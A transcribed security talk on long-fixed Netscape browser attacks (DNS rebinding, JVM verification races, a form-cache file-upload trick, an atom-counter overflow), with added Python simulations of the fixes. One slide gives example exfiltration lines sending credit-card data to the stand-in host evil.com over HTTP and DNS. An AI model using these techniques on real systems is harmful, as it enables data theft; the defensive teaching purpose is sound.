Attacks Against the Netscape Browser
Jim Roskind, PhD, VP, Chief Technical Officer, AOL Products, America Online Inc.

Post on 20-Dec-2015


Page 1: Attacks Against the Netscape Browser

Jim Roskind, PhD, VP, Chief Technical Officer, AOL Products, America Online Inc.

Page 2: Introduction

Attacks listed have long since been fixed… but techniques seem to last forever.

History forgotten is doomed to be repeated.

Open source policy suggested additional disclosure… and here I am.

Page 3: Who is Jim Roskind?

• Started doing Java security work on Navigator in November 1995
• Participated in most security firedrill responses to date
• Worked as Java Security Architect, developing signed code methodology

Page 4: What is an Attack?

• Data on a computer is taken without permission
  – Viewing history file, prefs, directory structure
  – Extreme: Client computer runs attacker’s binary code (a Very Bad Thing™)
• Minor attack would involve revealing a file’s existence

Page 5: What isn’t an Attack?

• Denial of service
  – Too easy for user to terminate or avoid
  – Too hard to tell where a jpeg decoding is in progress
• It is very hard to stop a Java thread
  – Threads can catch exceptions, and start new threads :-(

Page 6: Covert Channels: Getting the info Home to evil.com

• Connect home via http get
  – get www.evil.com/goodies?CreditCard…
• Let DNS lookup carry the info
  – get IP for creditCard5551212.goodies.evil.com
• Covert channels will always exist

Page 7: DNS (Domain Name Service)

• Java applets can traditionally only “phone home”
  – JS can read content from similarly sourced pages and frames
• What is the definition of home?
  – Applet sourced from www.evil.com
    • Can the applet contact www.evil.com?
    • What exactly is www.evil.com?

Page 8: DNS: Names to IP address

• DNS supports multiple IP addresses for a single name
  – Are all such IPs equivalent??
• DNS is dynamic
  – The mapping is time varying!
• Is the new IP equivalent to the old IP??

Page 9: Can you trust DNS info?

(Diagram: a browser on the intranet, behind a firewall. DNS records shown:)
www.evil.com: 6.6.6.666, 1.2.3.4
target.victim.com: 1.2.3.4
user.victim.com: 1.2.3.7

Page 10: First time, DNS is truthful

(Diagram: the browser behind the firewall issues “Get www.evil.com”. DNS records shown:)
www.evil.com: 6.6.6.666
target.victim.com: 1.2.3.4
user.victim.com: 1.2.3.7

Page 11: Second time, DNS misdirects

(Diagram: the browser behind the firewall issues “Get www.evil.com” again. DNS records shown:)
www.evil.com: 1.2.3.4
target.victim.com: 1.2.3.4
user.victim.com: 1.2.3.7

Page 12: DNS False Advertising

• “Real” problem is that DNS info arrived from *outside* containing intranet IP numbers
  – Firewall should stop such propagation
• Browser fix: Permanently cache exactly one IP after a single lookup
  – Not friendly to dynamic internet… but safe
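The two fixes on this slide, pinning in the browser and filtering at the perimeter, as an added Python simulation of the scenario on slides 9 to 11 (not code from the deck or from Netscape). The resolver, the class and function names and the intranet range 1.2.3.0/24 are assumptions, and the deck’s joke address 6.6.6.666 is replaced by the valid 6.6.6.66.

```python
from ipaddress import ip_address, ip_network

# Constructed answer sequence following the deck's scenario: the first lookup
# of www.evil.com is truthful, the second misdirects to an intranet address.
# (6.6.6.66 stands in for the deck's joke address 6.6.6.666, which is not a
# valid IPv4 address.)
DNS_ANSWERS = {"www.evil.com": ["6.6.6.66", "1.2.3.4"]}
INTRANET = ip_network("1.2.3.0/24")  # assumed address range of victim.com


class Resolver:
    """Stub resolver that hands out the scripted answers in order and keeps
    repeating the last one once the script is exhausted."""

    def __init__(self, answers):
        self._answers = {host: list(ips) for host, ips in answers.items()}

    def lookup(self, host):
        ips = self._answers[host]
        return ips.pop(0) if len(ips) > 1 else ips[0]


def naive_connect(resolver, host):
    """Original behaviour: every connection re-resolves the name, so the
    applet's "phone home" rule is satisfied by whatever IP DNS says now."""
    return resolver.lookup(host)


class PinningBrowser:
    """Browser fix from the deck: cache exactly one IP per host, permanently."""

    def __init__(self, resolver):
        self._resolver = resolver
        self._pinned = {}

    def connect(self, host):
        if host not in self._pinned:
            self._pinned[host] = self._resolver.lookup(host)
        return self._pinned[host]


def firewall_passes(ip, intranet=INTRANET):
    """Perimeter fix from the deck: a DNS answer arriving from outside must
    not carry an intranet address. Returns True if the answer may propagate."""
    return ip_address(ip) not in intranet


def simulate(connect):
    """Fetch www.evil.com twice and return the IPs each fetch actually used."""
    return [connect("www.evil.com") for _ in range(2)]


if __name__ == "__main__":
    shared = Resolver(DNS_ANSWERS)
    print("naive  :", simulate(lambda host: naive_connect(shared, host)))
    print("pinned :", simulate(PinningBrowser(Resolver(DNS_ANSWERS)).connect))
    for ip in DNS_ANSWERS["www.evil.com"]:
        print("firewall passes", ip, ":", firewall_passes(ip))
```

The naive browser reaches 1.2.3.4 (target.victim.com) on the second fetch while the pinning browser stays on 6.6.6.66, and the firewall check rejects the second answer independently of what the browser does.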

Page 13: Lesson Relearned: Composition of Safe systems can be unsafe

• DNS False advertising does not require a compromise of DNS infrastructure
• Don’t assume the world around is fixed and unchanging
  – DNS had dynamic nature that was NOT conceptually obvious

Page 14: Class Verification in JVM

• Load a class
  – Work out inheritance and overloading
• Initialize Vtables while working
  – Vtables are used to call “methods”
  – Load referenced classes
    • Causes recursion sometimes
  – Verify legal calling and arguments
  – Mark class as Verified

Page 15: Class Verification in JVM

• Bug was reported that “method dispatch” was causing a “null pointer” exception
• This meant vtable used before being initialized!
• This meant dispatch before verification
• Problem was in “recursion” handling

Page 16: Multithreaded JVM Class verification is not easy

• Class A refers to Class B, and vice versa
  – Thread 1 starts using class A
  – Thread 2 starts using class B
• Thread 1 starts verifying A, thread 2 starts verifying B
• When is verification done? ;-)

Page 17: Multithreaded apps are everywhere

• Two applets on a page is actually what surfaced this problem
• Reporters of this bug did not mention (or realize) that their app had run on multiple threads

Page 18: Lesson Relearned: Security fundamental functions, such as class verification, need a LOT of review

• Independent work caused rewrite of this code
• Class verification is hard

Page 19: Page Reloading with Old State

• Enter text in a form
• Follow a link
• Press back
• Your original text is restored into form

Page 20: Initial value in forms can be dangerous

• Initial values for “text” fields are safe, common and helpful
  – Prefill fields to save user typing
• Initial value for “file” fields are dangerous
  – A file field specifies file to upload (send? Steal?) to the server

Page 21: JavaScript: The “cache” is not always what it used to be

• JS can create a page anew at each load
  – On first load, a field is a text field
  – On second load, the “same”(?) field is a file field
• JS loads text field, traverses, “goes back,” reloads, and does the submit.
  – Be careful to mark the field “types” in saved data!
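The sequence on slides 19 to 21 and the advice to mark field types in the saved data, as an added Python model of the browser’s form-state cache (not code from the deck or from Netscape). The one-field page, the field name and the function names are assumptions.

```python
# Constructed model of a page that JS rewrites on each load: the "same" field
# is a text field the first time and a file-upload field the second time.
FIRST_LOAD = [("note", "text")]
SECOND_LOAD = [("note", "file")]


def save_form_state(fields, values):
    """Cache what the field held together with each field's type, which is
    the deck's advice ("mark the field types in saved data")."""
    return {name: {"type": ftype, "value": values.get(name, "")}
            for name, ftype in fields}


def restore_unsafe(saved, fields):
    """Original behaviour: the cache assumes a field with the same name still
    has the same type, so a saved text value lands in a file field."""
    return {name: saved[name]["value"] for name, _ in fields if name in saved}


def restore_safe(saved, fields):
    """Fixed behaviour: restore only when the saved type matches the field's
    current type, and never prefill a file field at all."""
    restored = {}
    for name, ftype in fields:
        entry = saved.get(name)
        if entry is None or entry["type"] != ftype or ftype == "file":
            continue
        restored[name] = entry["value"]
    return restored


if __name__ == "__main__":
    # The text value is set by the page's own script, not typed by the user,
    # so it can be any path; this one is constructed for the demonstration.
    cached = save_form_state(FIRST_LOAD, {"note": "/home/user/.netscape/prefs.js"})
    print("unsafe restore into file field:", restore_unsafe(cached, SECOND_LOAD))
    print("safe restore into file field  :", restore_safe(cached, SECOND_LOAD))
    print("safe restore into text field  :", restore_safe(cached, FIRST_LOAD))
```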

Page 22: Lesson Relearned: Adding new features (JS) can break old security

• Original implementation has reasonable assumptions
  – If it is in the cache, it must still be the same value… right??
• Browsers are very complex beasts when security is contemplated
  – Adding JS changed all the rules

Page 23: How many Atoms in our Universe?

• Atom is a spelling of a var or func name
  – JVM *had* 2^16 possible atom numbers
  – Who would use more than that many names?
• Attacker overran counter, and it wrapped
  – “Verified classes” no longer called the intended method :-/

Page 24: Controlling the number of atoms in the universe

• Proper solution came much later
  – Max count pushed to 2^32 (or higher?)
  – Bounds checking was added
• Short term Navigator solution: abort when atom table exhausted!
  – Zero reported defects from this hack solution!
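The wrap on the previous slide and the bounds check on this one, as an added Python model of an atom table (not code from the deck or from any JVM). The class and function names are assumptions, and the wrap is reproduced by masking the counter to 16 bits.

```python
ATOM_LIMIT = 2 ** 16  # number of atom ids the JVM originally had, per the deck


class WrappingAtomTable:
    """Original behaviour: a 16-bit counter nobody checks, so the 65537th
    distinct name silently receives id 0 again and steals that slot."""

    def __init__(self):
        self._next = 0
        self._ids = {}    # name -> atom id
        self._names = {}  # atom id -> name

    def intern(self, name):
        if name in self._ids:
            return self._ids[name]
        atom = self._next & 0xFFFF  # the wrap: bits above 16 are dropped
        self._next += 1
        self._ids[name] = atom
        self._names[atom] = name    # overwrites whoever held this id before
        return atom

    def resolve(self, atom):
        return self._names[atom]


class AtomTableExhausted(Exception):
    """Raised instead of wrapping; the deck's short-term fix aborted here."""


class BoundedAtomTable(WrappingAtomTable):
    """Fixed behaviour: an explicit limit checked before every assignment;
    the limit is a parameter, so the later 2^32 table is the same code."""

    def __init__(self, limit=ATOM_LIMIT):
        super().__init__()
        self._limit = limit

    def intern(self, name):
        if name in self._ids:
            return self._ids[name]
        if self._next >= self._limit:
            raise AtomTableExhausted(f"atom table full at {self._limit} names")
        atom = self._next  # no mask: an id is never reused
        self._next += 1
        self._ids[name] = atom
        self._names[atom] = name
        return atom


def dispatch_target_after_flood(table):
    """Intern "run", flood the table with ATOM_LIMIT more names, then resolve
    the cached atom as a verified class does at dispatch time. A bounded
    table that runs out reports "ABORT" instead of dispatching."""
    run_atom = table.intern("run")
    try:
        for i in range(ATOM_LIMIT):
            table.intern(f"name{i}")
    except AtomTableExhausted:
        return "ABORT"
    return table.resolve(run_atom)
```

With the wrapping table the atom cached for "run" resolves to "name65535" after the flood, which is the deck's wrong-method dispatch; the bounded table aborts at the old limit and dispatches correctly at the 2^32 one.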

Page 25: Lesson relearned: Static limits are evil

• There is more to overrun than string buffers!
• If there is a limit, it must be checked

Page 26: Trojan file landing locally

• JS needs to interact with pages from the same “site” (codebase?)
  – Java needs to contact the home site (codebase?)
• What can local JS and class files do?
  – Answer: Access other “local” content
  – Developers use this feature extensively

Page 27: Trojan content may land in existing files

• Cookies file contains contents supplied by server
  – Cookies can “look like” HTML and JS

Page 28: If they can’t find local content, they can’t (ab)use it

• Don’t let server know where content lands
  – “default” user was all too common
  – prefs.js file? Bookmarks file? Cookies file?
• Make it hard to guess where user files are kept (Netscape 6/Mozilla technique)
• Add poison to many files

Page 29: Lesson Relearned: Try to formulate and publicize security requirements

• The fact that it should be “hard” to guess locations of files is not well publicized
  – 3rd party content should not know where it lands
• Dependencies on “public don’ts” make it hard to maintain security
  – Example: Don’t write down your password!
  – Example: Don’t reuse a password

Page 30: Escaping HTML

• Classic Server side App Flaw
  – To display “<” use “&lt;” etc.
  – 3rd Party content must be escaped
• Raw content simulates JS, and accesses cookies etc. etc. etc.
  – News groups? Chat? URL not found?

Page 31: Client side HTML Escaping

• Most displays appear in “local” context
  – about:global
  – about:cache
  – Content tags in incoming email!
• Escape, escape, escape

Page 32: Lesson Relearned: Apply attack techniques to different environments

• Attacks on server must be studied
• That’s why it was worth mentioning the attack technique here ;-)

Page 33: Summary: Penetrate and Patch is a large part of real systems

• A browser is a very complex system
• To date, I don’t know of any “in the wild” exploits being used
  – Either we’re doing well, or our head is in the sand

Page 34: Netscape is Always working to improve security

• Send in security reports: http://help.netscape.com/forms/bug-security.html
• Bugs bounty program of $1000 still in place
  – You even get a T-Shirt ;-)

Page 35: Q & A